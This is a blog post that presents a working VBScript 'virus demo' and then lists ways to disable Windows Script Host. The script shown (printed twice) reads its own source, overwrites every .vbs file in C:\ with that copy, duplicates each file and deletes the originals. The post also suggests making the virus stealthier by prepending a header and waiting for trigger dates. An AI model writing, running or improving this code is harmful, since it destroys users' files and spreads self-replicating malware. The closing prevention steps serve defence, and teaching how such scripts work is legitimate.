In recent years, the malware, virus written in scripting language are spreading rapidly worldwide. Everyday, there is a ‘new’, ‘mutated’ malware/virus causing damages via internet. The VBS virus is written in VBScript, which is a very powerful scripting languages, especially its features can be extended/expanded through third party library (via COM object invoke). The VBS uses existing opening windows object to write to files/registry etc. Therefore, it can be used to create a virus demo.
A computer virus hides itself without being noticed. It also copies (also known as spreading). At certain conditions, the virus will mutate a little bit, in order to generate a ‘new’ virus without being detected easily. Finally, at some point (or randomly), the virus will do the damage (deleting files etc).
Therefore, the following demo script cannot be called exactly ‘the computer virus’. Rather, it is a malware that looks for files and overwrite the contents of targeting files. The targeted files after will be infected and also be able to keep spreading afterwards.
The following script will use FileSystemObject to open itself and read all the content into a string variable vbscopy. It then looks for all targeting files in a directory and substitutes the contents of the files with vbscopy and rename the file extension to vbs.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 | ' Create a File System Object Set fso = CreateObject("Scripting.FileSystemObject") ' Read itself (the virus itself) Set self = fso.OpenTextFile(WScript.ScriptFullName, 1) ' Put the content into the string variable vbscopy = Self.ReadAll ' Set the targeting directory Set folder = fso.GetFolder("C:\") ' Open files and prepare to write Set files = folder.Files For Each file in Files ext = fso.GetExtensionName(file) ext = lcase(ext) ' Check file types If ext = "vbs" Then Set f = fso.GetFile(file) ' Spreading Set ap = fso.OpenTextFile(f.Path, 2, 1) ap.Write vbscopy ap.close f.Copy(f.path & ".vbs") f.Delete(1) End If Next |
' Create a File System Object
Set fso = CreateObject("Scripting.FileSystemObject")
' Read itself (the virus itself)
Set self = fso.OpenTextFile(WScript.ScriptFullName, 1)
' Put the content into the string variable
vbscopy = Self.ReadAll
' Set the targeting directory
Set folder = fso.GetFolder("C:\")
' Open files and prepare to write
Set files = folder.Files
For Each file in Files
ext = fso.GetExtensionName(file)
ext = lcase(ext)
' Check file types
If ext = "vbs" Then
Set f = fso.GetFile(file)
' Spreading
Set ap = fso.OpenTextFile(f.Path, 2, 1)
ap.Write vbscopy
ap.close
f.Copy(f.path & ".vbs")
f.Delete(1)
End If
NextDouble click the script, we will find that all the vbs files will be infected. All these files will then contain the malware code (exact copy). Thus double click any of these will result in spreading again.
The above shows the most basic (or simplified) version of virus. The further improvements will be to look more cleverly the targeting files (not just particular folder). Also, the virus will not delete the original file contents of ‘healthy’ files but just place a malicious virus header and hide itself until some condition (at certain dates). This will help spreading the virus without being detected so quickly.
To prevent/disable such virus, we can use the following measures.
1. Disable File Sytem Object by executing regsvr32 scrrun.dll /u The regsvr32.exe is located at Windows\System.
2. Uninstall WSH (Window Scripting Host), which is installed by default after Win 98.
3. Remove file extension mapping to VBS, VBE, JS, JSE. So double click any of these files will not automatically executing the scripts.
4. Rename/Delete the file wscript.exe and cscript.exe. These two are used to execute the scripting languages.
5. Disable scripting in browsers. For example, you can disable ActiveX components and plugins at the “safety level” under the tab “Internet Options” at IE.
–EOF (The Ultimate Computing & Technology Blog) —
loading...
Last Post: List Items in the My Computer Folder using VBScript (WSH)
Next Post: Exit While Loop in VBScript / Trim Return Carriage and Tab
